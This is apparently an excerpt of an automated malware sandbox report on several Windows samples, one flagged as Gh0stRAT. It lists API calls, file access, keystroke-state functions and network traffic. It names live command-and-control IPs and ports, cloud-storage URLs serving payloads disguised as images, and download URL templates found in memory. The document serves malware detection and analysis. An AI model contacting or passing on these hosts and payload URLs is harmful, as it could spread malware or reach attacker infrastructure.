                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_00409040 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_0040935F __EH_prolog,FindFirstFileA,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_0040E79C __EH_prolog,FindFirstFileA,FindClose
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_004CA859 FindFirstFileA,FindClose
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_0040E965 __EH_prolog,FindFirstFileA,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_004469AF __EH_prolog,FindFirstFileA,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_004D2C75 __EH_prolog,lstrcpy,FtpFindFirstFileA
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_004472CA __EH_prolog,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_004A73D0 lstrcpy,FindFirstFileA,GetLastError,SetLastError
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_00427512 __EH_prolog,FindFirstFileA,FindClose
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_100126FA FindFirstFileExW
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe, Code function: 49_2_00425624 __EH_prolog,GetLogicalDriveStringsA
                Source: C:\Users\user\Documents\l0tiFM.exe, File opened: C:\Users\user
                Source: C:\Users\user\Documents\l0tiFM.exe, File opened: C:\Users\user\AppData
                Source: C:\Users\user\Documents\l0tiFM.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                Source: C:\Users\user\Documents\l0tiFM.exe, File opened: C:\Users\user\AppData\Roaming
                Source: C:\Users\user\Documents\l0tiFM.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Users\user\Documents\l0tiFM.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DFFE
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DDFF
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]6_2_0000000140011270
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DE96
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DEFB
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000E178
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]6_2_000000014000DDD9

                Networking

                Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.8:49988 -> 8.210.66.183:8917
                Source: global trafficTCP traffic: 192.168.2.8:49988 -> 8.210.66.183:8917
                Source: global trafficTCP traffic: 192.168.2.8:49995 -> 38.45.124.13:8050
                Source: Joe Sandbox ViewIP Address: 118.178.60.9 118.178.60.9
                Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknownTCP traffic detected without corresponding DNS query: 38.45.124.13
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0041C471 __EH_prolog,GetTempPathA,GetTempFileNameA,SetFileAttributesA,DeleteFileA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GlobalFree,GlobalFree,GlobalFree,FreeLibrary,URLDownloadToFileA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,49_2_0041C471
                Source: global traffic, HTTP traffic detected: GET /i.dat HTTP/1.1; User-Agent: GetData; Host: 662hfg.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /a.gif HTTP/1.1; User-Agent: GetData; Host: 662hfg.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /b.gif HTTP/1.1; User-Agent: GetData; Host: 662hfg.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /c.gif HTTP/1.1; User-Agent: GetData; Host: 662hfg.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /d.gif HTTP/1.1; User-Agent: GetData; Host: 662hfg.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /s.dat HTTP/1.1; User-Agent: GetData; Host: 662hfg.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /s.jpg HTTP/1.1; User-Agent: GetData; Host: 662hfg.oss-cn-beijing.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /drops.jpg HTTP/1.1; User-Agent: GetData; Host: 22mm.oss-cn-hangzhou.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /f.dat HTTP/1.1; User-Agent: GetData; Host: 22mm.oss-cn-hangzhou.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1; User-Agent: GetData; Host: 22mm.oss-cn-hangzhou.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1; User-Agent: GetData; Host: 22mm.oss-cn-hangzhou.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /FOM-52.jpg HTTP/1.1; User-Agent: GetData; Host: 22mm.oss-cn-hangzhou.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /FOM-53.jpg HTTP/1.1; User-Agent: GetData; Host: 22mm.oss-cn-hangzhou.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /extra-task2.png HTTP/1.1; User-Agent: Chrome/114.0.0.0; Host: upitem.oss-cn-hangzhou.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /dsb-hr2.png HTTP/1.1; User-Agent: Chrome/114.0.0.0; Host: upitem.oss-cn-hangzhou.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /dsb-hr3.png HTTP/1.1; User-Agent: Chrome/114.0.0.0; Host: upitem.oss-cn-hangzhou.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /dsb-hr1.png HTTP/1.1; User-Agent: Chrome/114.0.0.0; Host: upitem.oss-cn-hangzhou.aliyuncs.com; Cache-Control: no-cache
                Source: global traffic, HTTP traffic detected: GET /page-404.png HTTP/1.1; User-Agent: Chrome/114.0.0.0; Host: upitem.oss-cn-hangzhou.aliyuncs.com; Cache-Control: no-cache
                Source: global trafficDNS traffic detected: DNS query: 662hfg.oss-cn-beijing.aliyuncs.com
                Source: global trafficDNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
                Source: global trafficDNS traffic detected: DNS query: gqsqoq.net
                Source: global trafficDNS traffic detected: DNS query: upitem.oss-cn-hangzhou.aliyuncs.com
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/%d.dll
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/%d.dllC:
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txt
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txtC:
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/upx.rar
                Source: DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://%s/upx.rarC:
                Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
                Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                Source: lBoqoqIC.exe, 00000031.00000002.3351620022.00000000030EF000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://cinskw.net:6090/license
                Source: lBoqoqIC.exe, 00000031.00000002.3351620022.00000000030EF000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://cinskw.net:6090/licensecinskw.net
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://crl.globalsign.com/root.crl0G
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                Source: l0tiFM.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
                Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
                Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
                Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
                Source: l0tiFM.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ocsp.thawte.com0
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: l0tiFM.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://s.symcd.com06
                Source: l0tiFM.exe.0.drString found in binary or memory: http://s.symcd.com0_
                Source: l0tiFM.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://s2.symcb.com0
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microso
                Source: DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.c
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
                Source: l0tiFM.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://sv.symcd.com0&
                Source: l0tiFM.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://sw.symcd.com0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                Source: l0tiFM.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                Source: l0tiFM.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                Source: l0tiFM.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                Source: l0tiFM.exe.0.dr, 189atohci.sys.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                Source: l0tiFM.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                Source: lBoqoqIC.exe, 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpString found in binary or memory: http://www.indigorose.com/route.php?pid=suf60buy
                Source: l0tiFM.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
                Source: l0tiFM.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
                Source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg
                Source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51
                Source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg
                Source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg
                Source: l0tiFM.exe, 00000007.00000003.2330226957.0000000003CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg
                Source: l0tiFM.exe, 00000007.00000003.2257245809.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, l0tiFM.exe, 00000007.00000003.2256932000.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg
                Source: 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/
                Source: 2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1003F
                Source: 2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D27000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-1003
                Source: 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-1003F
                Source: 2976587-987347589.07.exe, 00000000.00000003.1935998840.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954749975.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif
                Source: 2976587-987347589.07.exe, 00000000.00000003.1935998840.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954749975.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifB
                Source: 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D40000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954749975.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/b
                Source: 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954749975.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/b.gif
                Source: 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif
                Source: 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif
                Source: 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/d.gifn
                Source: 2976587-987347589.07.exe, 00000000.00000003.1935998840.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat
                Source: 2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D27000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/v
                Source: 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://662hfg.oss-cn-beijing.aliyuncs.com/z
                Source: l0tiFM.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                Source: l0tiFM.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                Source: l0tiFM.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
                Source: l0tiFM.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
                Source: lBoqoqIC.exe, 00000031.00000002.3351388145.0000000002D2A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://page-404.png
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/
                Source: DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/D
                Source: lBoqoqIC.exe, 00000031.00000002.3348959801.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/N
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png2I
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png3
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngXH
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngiH
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngvI
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr2.png
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png3H
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png;
                Source: DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.pngfH
                Source: DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AA9000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/extra-task2.png
                Source: DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/extra-task2.pngI
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/m
                Source: DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/n
                Source: lBoqoqIC.exe, 00000031.00000002.3348959801.0000000000786000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002BB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.png
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002BB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.png%95b9
                Source: lBoqoqIC.exe, 00000031.00000002.3348959801.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.png-
                Source: lBoqoqIC.exe, 00000031.00000002.3348959801.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.pngT
                Source: lBoqoqIC.exe, 00000031.00000002.3348959801.0000000000766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.pngck
                Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: lBoqoqIC.exe.42.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe.42.drString found in binary or memory: https://www.globalsign.com/repository/06
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownHTTPS traffic detected: 39.103.20.105:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.8:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.2.8:49990 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 118.178.60.103:443 -> 192.168.2.8:49994 version: TLS 1.2
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00402C94 GetAsyncKeyState,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,49_2_00402C94
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C8744 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,49_2_004C8744
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004D188E GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,49_2_004D188E
